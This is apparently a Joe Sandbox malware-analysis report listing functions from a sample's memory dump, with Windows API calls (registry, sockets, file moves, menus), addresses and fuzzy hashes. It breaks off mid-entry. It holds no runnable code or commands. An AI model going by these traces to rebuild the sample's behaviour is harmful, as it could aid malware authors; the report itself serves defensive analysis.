Opcode ID: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
Instruction ID: 2641255b3641ef68007f2e73cb720596d58fdc4497b83cee3e93a9cfc8a7e71d
Opcode Fuzzy Hash: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
Instruction Fuzzy Hash: A751F6A05047D53DFF3283248C49BBABFA9FF86B00F088589E1D4C69C2D799AC94D791

Function 0083589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 008358AC
_wcsncpy.LIBCMT ref: 008358E1
_wcsncpy.LIBCMT ref: 00835913
_wcsncpy.LIBCMT ref: 00835946
_wcsncpy.LIBCMT ref: 00835988
_wcsncpy.LIBCMT ref: 008359C2
_wcsncpy.LIBCMT ref: 008359F1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 02b3d85b5ba7c4d72d08c62113480e90ba88c5a79be3294507c6a4726d70be37
Instruction ID: fba50070dacd8c4b61ffe55a30651e661626e19461d3b9ec54d8b275ea45f4e9
Opcode Fuzzy Hash: 02b3d85b5ba7c4d72d08c62113480e90ba88c5a79be3294507c6a4726d70be37
Instruction Fuzzy Hash: A641A665C2152CB6CB10F7B4888E9DF77A8EF04710F508962FA18E3212E638D715D7EA

Function 008338AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008338D3,?), ref: 008348C7

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008338D3,?), ref: 008348E0

lstrcmpiW.KERNEL32(?,?), ref: 008338F3
_wcscmp.LIBCMT ref: 0083390F
MoveFileW.KERNEL32(?,?), ref: 00833927
_wcscat.LIBCMT ref: 0083396F
SHFileOperationW.SHELL32(?), ref: 008339DB

Strings

\*.*, xrefs: 00833969

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 31c584ae599d63e0f207a5d69c2249df4107f3b8f7eba6553442ada22c0ca75b
Instruction ID: c5e58f6bc44515c88b6bc9cf2c0a2475bd2f8bb8b3a89e93734cf5c139f25abc
Opcode Fuzzy Hash: 31c584ae599d63e0f207a5d69c2249df4107f3b8f7eba6553442ada22c0ca75b
Instruction Fuzzy Hash: 4B418171508344DACB51EF64C485AEBBBE8FF89350F00192EB489C3251EA78D689C792

Function 00857500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00857519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008575C0
IsMenu.USER32(?), ref: 008575D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00857620
DrawMenuBar.USER32 ref: 00857633

Strings

0, xrefs: 0085750D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 86a453c468e5cfabdc8ce00ddd9dc96f3febd03b06bca1feaec22914dbf0be76
Instruction ID: abb9cf552850afdda92cc000b92cfcff33fbca495123dcad231bd7b2ae9cfdfc
Opcode Fuzzy Hash: 86a453c468e5cfabdc8ce00ddd9dc96f3febd03b06bca1feaec22914dbf0be76
Instruction Fuzzy Hash: 4C414975A04609EFDB10DF54E884E9ABBF8FB14356F048129ED15E7250E730AD54CF90

Function 0085122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0085125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00851286
FreeLibrary.KERNEL32(00000000), ref: 0085133D

Part of subcall function 0085122D: RegCloseKey.ADVAPI32(?), ref: 008512A3
Part of subcall function 0085122D: FreeLibrary.KERNEL32(?), ref: 008512F5
Part of subcall function 0085122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00851318

RegDeleteKeyW.ADVAPI32(?,?), ref: 008512E0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 219bd862eeb43bb9a7b33a4ec84752026caa732c24fdf92ca061115d5e98b841
Instruction ID: a957ee09c19bf32188350a97d1aea59ebcb381d142dd93248fc9b42529ec2ef9
Opcode Fuzzy Hash: 219bd862eeb43bb9a7b33a4ec84752026caa732c24fdf92ca061115d5e98b841
Instruction Fuzzy Hash: 3B311B71901209BFDF15DB94DC99EFFB7BCFB08351F000169E911E2251DB789E499AA0

Function 0085653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0085655B
GetWindowLongW.USER32(016335D8,000000F0), ref: 0085658E
GetWindowLongW.USER32(016335D8,000000F0), ref: 008565C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008565F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0085661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00856630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0085664A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d354c11b479699b2d42373eff4e001f089a6c31600737fcfe77092d22a7a0dc5
Instruction ID: 5032a314279a49560937a0eaee171773167294148edb447c5f2c7164612647fd
Opcode Fuzzy Hash: d354c11b479699b2d42373eff4e001f089a6c31600737fcfe77092d22a7a0dc5
Instruction Fuzzy Hash: FB312430644210AFDB20DF18DC85F553BE1FB5A352F9801A9FA01DB2B6EB71AC68DB41

Function 00846486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008480A0: inet_addr.WS2_32(00000000), ref: 008480CB

socket.WS2_32(00000002,00000001,00000006), ref: 008464D9
WSAGetLastError.WS2_32(00000000), ref: 008464E8
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00846521
connect.WSOCK32(00000000,?,00000010), ref: 0084652A
WSAGetLastError.WS2_32 ref: 00846534
closesocket.WS2_32(00000000), ref: 0084655D
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00846576

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 4705e2c3dcf7bca501ff931cd46c8ec9ac00d6847f8f18ff48a2676d22cb3089
Instruction ID: 2826ad14211c38b1391c62e10d28c91596e907778be7c6a71f074682e12f7991
Opcode Fuzzy Hash: 4705e2c3dcf7bca501ff931cd46c8ec9ac00d6847f8f18ff48a2676d22cb3089
Instruction Fuzzy Hash: 1131903160021CABDF10AF24CC85BBE7BBCFB45715F008069FA09E7291EB74AD14CA62

Function 0085783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008578A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008578AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008578B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008578C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008578D4

Strings

Msctls_Progress32, xrefs: 00857872

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3f69a4b8a3cf87271d54487cbf891010b282f34a212ea83279929323d84f444f
Instruction ID: 45101f7fbb241abbfe355dba3d25885aed4fb7d21388b32d810064eb44194079
Opcode Fuzzy Hash: 3f69a4b8a3cf87271d54487cbf891010b282f34a212ea83279929323d84f444f
Instruction Fuzzy Hash: 0A118EB2110219BFEF159E60CC85EE77F6DFF087A8F018125FA04A2090C772AC21DBA4

Function 007F41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 007F41E3
GetProcAddress.KERNEL32(00000000), ref: 007F41EA
RtlEncodePointer.NTDLL(00000000), ref: 007F41F6
RtlDecodePointer.NTDLL(00000001), ref: 007F4213

Strings

RoInitialize, xrefs: 007F41D2
combase.dll, xrefs: 007F41DE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 176c5ceeea0027eb1e33429407fa69cb845fe474746ca4f313a700c1c2881055
Instruction ID: 48fbe4027867ee6dc0ae1348cd4b0a2c1d8300a03dfd1e1508af8658a7b51173
Opcode Fuzzy Hash: 176c5ceeea0027eb1e33429407fa69cb845fe474746ca4f313a700c1c2881055
Instruction Fuzzy Hash: D4E01AB0690704AFEB207BB0EC0DF553AA5B720743F545435B622D56E1DBBE40968F00

Function 007F429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007F41B8), ref: 007F42B8
GetProcAddress.KERNEL32(00000000), ref: 007F42BF
RtlEncodePointer.NTDLL(00000000), ref: 007F42CA
RtlDecodePointer.NTDLL(007F41B8), ref: 007F42E5

Strings

RoUninitialize, xrefs: 007F42A7
combase.dll, xrefs: 007F42B3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 1922f7f1c43704f4e095c54ceed3341dab7162df33a86553ae279ea9ce389bbf
Instruction ID: 66f2d62c32a2b606602c5ab421bf13062bafe81af6070ac15c2e2832dbd688f1
Opcode Fuzzy Hash: 1922f7f1c43704f4e095c54ceed3341dab7162df33a86553ae279ea9ce389bbf
Instruction Fuzzy Hash: 5CE0B678581704ABEB10AB60EC0DF563AA4B724787F14502AF215E22B1CBBC4545CA18

Function 00846E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WS2_32(00000000,?), ref: 00846F14
WSAGetLastError.WS2_32(00000000), ref: 00846F48
htons.WS2_32(?), ref: 00846FFE
inet_ntoa.WS2_32(?), ref: 00846FBB

Part of subcall function 0082AE14: _strlen.LIBCMT ref: 0082AE1E
Part of subcall function 0082AE14: _memmove.LIBCMT ref: 0082AE40

_strlen.LIBCMT ref: 00847058
_memmove.LIBCMT ref: 008470C1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: edacd568e9108bc938b873a4aee07814868fdb0c2e23c74c60ebd78f533704b6
Instruction ID: 3512ab449b59f8f8fbc5aed9f688bdb1cc9309ce953ea9db5486376a1f5c788d
Opcode Fuzzy Hash: edacd568e9108bc938b873a4aee07814868fdb0c2e23c74c60ebd78f533704b6
Instruction Fuzzy Hash: 8181CE71108704EBD710EB24CC89E6BB7F9FF84714F10491AF6559B292EB74AD04CB92

Function 0083675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008368AD
_memmove.LIBCMT ref: 008367E8

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

_memmove.LIBCMT ref: 0083685B
_memmove.LIBCMT ref: 00836942
_memmove.LIBCMT ref: 0083695B
_memmove.LIBCMT ref: 00836977

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 104fac9c9b80848fd4081d9cce54d752f16b10a37ae2b71fb13f5fc2f3c98fc7
Instruction ID: e5a6a71011a0b55850fbc2e938e24610fb6495570678fd8997374b816efe416a
Opcode Fuzzy Hash: 104fac9c9b80848fd4081d9cce54d752f16b10a37ae2b71fb13f5fc2f3c98fc7
Instruction Fuzzy Hash: 3A61A13050065AEBCF11EF24C885EFE37A8FF84308F44851AF9559B292EB38A951CB91

Function 0085046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 008510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00850588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008505AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008505D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00850617
RegCloseKey.ADVAPI32(00000000), ref: 00850624

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 199aa51fe97b5080e8069c8e9d24ae0ee13017330a6d7f0b03d8d7fa86502323
Instruction ID: 60ef8ea021c2be7ca6a10bce9852fcb7337ae260dbd4f68b82f6a86387443efc
Opcode Fuzzy Hash: 199aa51fe97b5080e8069c8e9d24ae0ee13017330a6d7f0b03d8d7fa86502323
Instruction Fuzzy Hash: D7513931108304EFCB14EB24C889E6ABBF8FF84355F04491DF955972A2EB35E909CB52

Function 00855A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00855A82
GetMenuItemCount.USER32(00000000), ref: 00855AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00855AE1
GetMenuItemID.USER32(?,?), ref: 00855B50
GetSubMenu.USER32(?,?), ref: 00855B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00855BAF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 03694ffec0bd41dbee0bcbe6fb513a6ca54fae03aa86633769a62ed4dda639b4
Instruction ID: e5b920086af8983eb4594e42ab940bc4b39f58fc79fdfc7621e3f15005e98375
Opcode Fuzzy Hash: 03694ffec0bd41dbee0bcbe6fb513a6ca54fae03aa86633769a62ed4dda639b4
Instruction Fuzzy Hash: 9F517C31A00629EFCF11AFA4C859AAEBBB5FF48321F104469ED11F7351CB34AE458B91

Function 0082F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0082F3F7
VariantClear.OLEAUT32(00000013), ref: 0082F469
VariantClear.OLEAUT32(00000000), ref: 0082F4C4
_memmove.LIBCMT ref: 0082F4EE
VariantClear.OLEAUT32(?), ref: 0082F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0082F569

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: c8f8df3ee0d9e7fc3a00a6e93f7b2f159bec210d29711d0dab5268cb49d8a2b7
Instruction ID: 7275da43e2dd3bfd2f283560b234a6284196030b74edf019c280c4bf8e36da85
Opcode Fuzzy Hash: c8f8df3ee0d9e7fc3a00a6e93f7b2f159bec210d29711d0dab5268cb49d8a2b7
Instruction Fuzzy Hash: EC5168B5A00219EFCB10DF58D884AAAB7B8FF4C314B158169EA59DB301D734E951CFA0

Function 008326F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832792
IsMenu.USER32(00000000), ref: 008327B2
CreatePopupMenu.USER32 ref: 008327E6
GetMenuItemCount.USER32(000000FF), ref: 00832844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00832875

Memory Dump Source

